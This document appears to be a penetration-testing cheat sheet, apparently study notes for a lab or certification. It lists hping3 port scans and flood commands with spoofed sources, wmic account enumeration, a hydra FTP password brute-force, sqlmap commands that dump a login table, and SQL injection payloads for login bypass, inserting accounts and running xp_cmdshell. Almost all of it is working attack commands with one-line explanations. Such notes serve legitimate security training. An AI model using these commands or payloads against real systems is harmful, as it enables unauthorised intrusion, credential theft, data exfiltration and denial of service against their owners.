hping3 --scan 1-3000 -S 10.10.10.10
--scan parameter defines the port range to scan and –S represents SYN flag.hping3 -c 3 10.10.10.10
-c 3 means that we only want to send three packets to the target machine.hping3 10.10.10.10 --udp --rand-source --data 500
hping3 -S 10.10.10.10 -p 80 -c 5
hping3 10.10.10.10 --flood
wmic useraccount get name,sid
--> Get user acc names and SIDhttp.request.method == “POST”
-> Wireshark filter for filtering HTTP POST request hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://10.10.10.11
sqlmap -u “
http://www.example.com/viewprofile.aspx?id=1”
--cookie="cookies xxx" -D moviescope --tables
sqlmap -u “
http://www.example.com/viewprofile.aspx?id=1”
--cookie="cookies xxx" -D moviescope -T User_Login --columns
sqlmap -u “
http://www.example.com/viewprofile.aspx?id=1”
--cookie="cookies xxx" -D moviescope -T User_Login --dump
blah' or 1=1 --
blah';insert into login values ('john','apple123');
blah';create database mydatabase;
blah';exec master..xp_cmdshell 'ping www.moviescope.com -l 65000 -t'; --